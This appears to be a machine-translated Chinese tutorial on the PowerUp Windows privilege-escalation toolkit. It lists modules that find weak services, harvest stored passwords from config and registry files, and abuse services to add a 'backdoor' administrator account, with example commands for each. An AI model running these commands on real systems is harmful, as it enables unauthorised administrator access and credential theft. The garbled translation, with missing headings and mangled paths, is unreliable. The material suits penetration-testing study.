PowerUp是Privesc模块下的脚本,功能非常强大,有很多实用的脚本可用于查找目标主机上的Windows服务漏洞并挖掘其权利
在Windows上,通常会遇到服务器,该服务器可以通过内核漏洞提高权限,但由于内核漏洞而无法提取权限。 在这种情况下,必须使用脆弱的Windows服务提取权限,或者使用常规系统服务通过继承的系统权限提取权限。 当内核权限失效时,该框架可以实现查找服务器漏洞并通过漏洞提取权限的目的。
PowerUp下的模块:1.Invoke-AllChecks此模块可以自动运行PowerUp下的所有脚本以检查目标主机,然后通过输出命令运行该模块
命令: Invoke-AllChecks
检测到系统漏洞
2.Find-PathDLLHijack此模块用于检查用户当前可以写入%PATH%中的哪些目录
命令: Find-Pathdllhijack
系统的可写目录检查成功
3.Get-ApplicationHost此模块使用系统上的applicationHost.config文件恢复加密的APP应用程序池和虚拟目录的口令
命令:获取应用程序主机
或get-application host (格式表-授权)列表视图
4.get-registryalwaysinstallelevated此模块检查是否设置了alwaysinstallelevated注册表项。 如果设置,则表示MSI文件是系统权限允许的
命令:获取注册
5.Get-RegistryAutoLogon此模块用于检测是否在Winlogin注册表中设置了AutoAdminLogon条目,可以查询默认用户名和密码
命令:获取注册表自动登录
6 .获取服务详细信息此模块用于返回服务的信息
命令:获取服务详细信息服务名称DHCP
成功获取了DHCP服务的详细信息
7 .获取服务文件权限此模块用于检查当前用户可以写入与哪些服务目录相关的可执行文件,并可以从这些文件中提取权限
命令:获取服务文件权限
不知道为什么…
8.Test-ServiceDaclPermisssion此模块检查所有可用服务,然后尝试对这些打开的服务进行更改。 如果可以更改,则返回服务对象
命令: Test-ServiceDaclPermission
9.Get-ServiceUnquoted此模块检查服务路径并返回包含空格且不带引号的服务路径
这里利用Windows的逻辑漏洞。 这意味着,如果文件包含空格,Windows API将被解释为两个路径,同时运行这两个文件可能会在某些情况下提高权限。 例如,C:program fileshello.exe被解释为c3360program
命令:获取服务未授权
不知道为什么…
10 .获取-取消激活此模块用于检查以下路径以确定这些文件是否存在: 这些文件可能包含部署证书,这些文件包含:
Sysprep.xml
Sysprep.inf
Unattended.xml
Unattend.xml
命令:获取-不可用dedinstallfile
11.get-modifiableregistryautorun此模块检查启动时自动启动的APP应用程序路径和注册表项值,并返回当前用户可以修改的程序路径。 被检查的注册表键值如下。
hklm :softwareMicrosoftwindowscurrent versionrun
hklm :softwareMicrosoftwindowscurrent versionrunonce
hklm :softwarewow 6432 nodeMicrosoftwindowscurrent versionrun
hklm :softwarewow 6432 nodeMicrosoftwindowscurrent versionrunonce
hklm :softwareMicrosoftwindowscurrent versionrun service
hklm :softwareMicrosoftwindowscurrent versionrunonce service
hklm :softwarewow 6432 nodeMicrosoftwindowscurrent versionrun service
hklm :softwarewow 6432 nodemicr
osoftWindowsCurrentVersionRunOnceService命令:Get-ModifiableRegistryAutoRun
成功检查应用程序的路径和注册表键值 12.Get-ModifiableScheduledTaskFile
该模块用于返回当前用户能够修改的计划任务程序的名称和路径
命令:Get-ModifiableScheduledTaskFile
成功检查计划任务程序
该模块用于返回当前服务器上web.config文件中的数据库连接字符串的明文
命令:get-webconfig
成功检查web.config中的数据库
该模块通过修改服务来添加用户到指定组,并可以通过设置-cmd参数触发添加用户的自定义命令
命令:Invoke-ServiceAbuse -ServiceName VulnSVC #添加默认账号
Invoke-ServiceAbuse -ServiceName VulnSVC -UserName “TESTLABjohn” #指定添加的域账号
Invoke-ServiceAbuse -ServiceName VulnSVC -UserName backdoor -Password password -LocalGroup “Administrators” #指定添加用户,用户密码以及添加的用户组
Invoke-ServiceAbuse -ServiceName VulnSVC -Command “net …” #自定义执行命令
该模块用于恢复服务的可执行文件到原始目录
命令:Restore-ServiceBinary -ServiceName VulnSVC
该模块用于检查某个用户是否在服务中有自由访问控制的权限,结果会返回true或false
命令:Restore-ServiceDaclPermission -ServiceName VulnSVC
该模块用于输出一个自定义命令并且能够自我删除的.bat文件到$env:Tempdebug.bat,并输出一个能够启动这个bat文件的DLL
18.Write-UserAddMSI该模块用于生成一个安装文件,运行这个安装文件后会弹出添加用户的对话框
命令:Write-UserAddMSI
该模块用于预编译C#服务的可执行文件,默认创建一个管理员账号,可通过Command定制自己的命令
命令: Write-ServiceBinary -ServiceName VulnSVC #添加默认账号
Write-ServiceBinary -ServiceName VulnSVC -UserName “TESTLABjohn” #指定添加的域账号
Write-ServiceBinary -ServiceName VulnSVC -UserName backdoor -Password password -LocalGroup “Administrators” #指定添加用户,用户密码以及添加的用户组
Write-ServiceBinary -ServiceName VulnSVC -Command “net …” #自定义执行命令
该模块通过Install-ServiceBinary写一个C#的服务用来添加用户
命令: Install-ServiceBinary -ServiceName DHCP #添加默认账号
Install-ServiceBinary -ServiceName VulnSVC -UserName “TESTLABjohn” #指定添加的域账号
Install-ServiceBinary -ServiceName VulnSVC -UserName backdoor -Password password -LocalGroup “Administrators” #指定添加用户,用户密码以及添加的用户组
Install-ServiceBinary -ServiceName VulnSVC -Command “net …” #自定义执行命令
Write-ServiceBinary与Install-ServiceBinary的不同是,前者生成可执行文件,后者直接安装服务